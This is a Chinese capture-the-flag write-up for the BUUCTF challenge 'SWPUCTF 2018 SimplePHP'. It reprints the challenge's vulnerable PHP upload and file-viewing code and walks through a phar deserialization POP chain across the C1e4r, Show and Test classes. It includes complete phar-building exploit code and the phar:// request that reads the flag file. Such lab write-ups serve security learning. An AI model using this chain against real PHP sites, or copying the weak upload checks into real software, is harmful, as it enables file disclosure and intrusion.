BUUCTF-WEB之[SWPUCTF 2018]SimplePHP

[SWPUCTF 2018]SimplePHP

考点:phar反序列化、代码审计
当点击查看文件的时候发现可疑点http://120c99fe-157d-4ecc-8b63-b4198d09299f.node4.buuoj.cn:81/file.php?file=读取index.php文件的时候发现可以读取到源码,将源码全部读取过来。
456

index.php

<?php 
header("content-type:text/html;charset=utf-8");  
include 'base.php';
?> 

定位到base.php

base.php

<?php 
    session_start(); 
?> 
<!DOCTYPE html> 
<html> 
<head> 
    <meta charset="utf-8"> 
    <title>web3</title> 
    <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css"> 
    <script src="https://cdn.staticfile.org/jquery/2.1.1/jquery.min.js"></script> 
    <script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script> 
</head> 
<body> 
    <nav class="navbar navbar-default" role="navigation"> 
        <div class="container-fluid"> 
        <div class="navbar-header"> 
            <a class="navbar-brand" href="index.php">首页</a> 
        </div> 
            <ul class="nav navbar-nav navbra-toggle"> 
                <li class="active"><a href="file.php?file=">查看文件</a></li> 
                <li><a href="upload_file.php">上传文件</a></li> 
            </ul> 
            <ul class="nav navbar-nav navbar-right"> 
                <li><a href="index.php"><span class="glyphicon glyphicon-user"></span><?php echo $_SERVER['REMOTE_ADDR'];?></a></li> 
            </ul> 
        </div> 
    </nav> 
</body> 
</html> 
<!--flag is in f1ag.php-->

这里输出了一个REMOTE_ADDR,也就是我的ip地址。也就是首页的IP。也告诉了flag文件名称,估计是让进行文件读取操作

这里需要知道:REMOTE_ADDR 协议头是不可伪造的

所以漏洞点不在这里

file.php

<?php 
header("content-type:text/html;charset=utf-8");  
include 'function.php'; 
include 'class.php'; 
ini_set('open_basedir','/var/www/html/'); 
$file = $_GET["file"] ? $_GET['file'] : ""; 
if(empty($file)) { 
    echo "<h2>There is no file to show!<h2/>"; 
} 
$show = new Show(); 
if(file_exists($file)) { 
    $show->source = $file; 
    $show->_show(); 
} else if (!empty($file)){ 
    die('file doesn\'t exists.'); 
} 
?> 

使用file_exists()函数来检测file传入的文件是否存在,如果存在,将文件赋值给Show类的$source,并且调用_show()方法,Show类在class文件中。

public function _show()
{
    if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
        die('hacker!');
    } else {
        highlight_file($this->source);
    }
}

文件名——》file_exists()——》正则过滤》读取。显然这里没有过滤phar协议。

upload_file.php

<?php 
include 'function.php'; 
upload_file(); 
?> 
<html> 
<head> 
<meta charest="utf-8"> 
<title>文件上传</title> 
</head> 
<body> 
<div align = "center"> 
        <h1>前端写得很low,请各位师傅见谅!</h1> 
</div> 
<style> 
    p{ margin:0 auto} 
</style> 
<div> 
<form action="upload_file.php" method="post" enctype="multipart/form-data"> 
    <label for="file">文件名:</label> 
    <input type="file" name="file" id="file"><br> 
    <input type="submit" name="submit" value="提交"> 
</div> 

</script> 
</body> 
</html>

用来上传文件,并且与function,php配合来检查文件合法性:上传的文件经过function.php文件中的upload_file()在检查完文件名合法后给上传的文件重命名

$filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 

放在upload文件夹下

function.php

<?php 
//show_source(__FILE__); 
include "base.php"; 
header("Content-type: text/html;charset=utf-8"); 
error_reporting(0); 
function upload_file_do() { 
    global $_FILES; 
    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 
    //mkdir("upload",0777); 
    if(file_exists("upload/" . $filename)) { 
        unlink($filename); 
    } 
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename); 
    echo '<script type="text/javascript">alert("上传成功!");</script>'; 
} 
function upload_file() { 
    global $_FILES; 
    if(upload_file_check()) { 
        upload_file_do(); 
    } 
} 
function upload_file_check() { 
    global $_FILES; 
    $allowed_types = array("gif","jpeg","jpg","png"); 
    $temp = explode(".",$_FILES["file"]["name"]); 
    $extension = end($temp); 
    if(empty($extension)) { 
        //echo "<h4>请选择上传的文件:" . "<h4/>"; 
    } 
    else{ 
        if(in_array($extension,$allowed_types)) { 
            return true; 
        } 
        else { 
            echo '<script type="text/javascript">alert("Invalid file!");</script>'; 
            return false; 
        } 
    } 
} 
?>

class.php

<?php
class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}

_show()类中如果要进行文件读取获得flag文件可是文件名会被过滤,另找方法。
在Test类中存在_get()函数:当调用一个不存在的方法的时候触发_get__get又会触发get函数,get又会触发file_get函数来读取文件,而file_get函数将文件内容进行base64加密。
那么就需要找一个不存在的方法来触发__get。在Show类中的__tostring()方法让str['str']变成Test类,然后再调用source就会触发。这里找到__toString的触发点,在把一个类当成字符串的时候才会触发,可以利用C1e4r

总体思路:

通过C1e4r,将str赋值为Show类,触发__tostring方法,将str['str']赋值为Test类调用source触发Test__get()方法–>get–>file_get->flag

pop链子:

<?php
class C1e4r
{
    public $test;
    public $str;
}

class Show
{
    public $source;
    public $str;
}

class Test
{
    //Test类中没有source属性,可以根据这个调用__get()函数
    public $file;
    public $params;//数组类型的数值
}


$a = new C1e4r();
$b = new Show();
$c = new Test();

$a->str = $b;
$b->str['str'] = $c;
$c->params['source'] = "/var/www/html/f1ag.php";

@unlink('test.phar');

$phar=new Phar('test.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata($a);//链子以$a为起点
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
?>

将生成的phar文件改为png文件后缀然后上传
456
然后访问upload文件夹
123
使用phar协议读取文件
http://38b4a3d2-8682-421d-91a5-7adf667005a3.node4.buuoj.cn:81/file.php?file=phar://upload/a8814e077fc8a92d25a18efa7c4d87ec.jpg
789
将得到的源码进行base64解密拿到flag

打赏
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!

请我喝杯咖啡吧~

支付宝
微信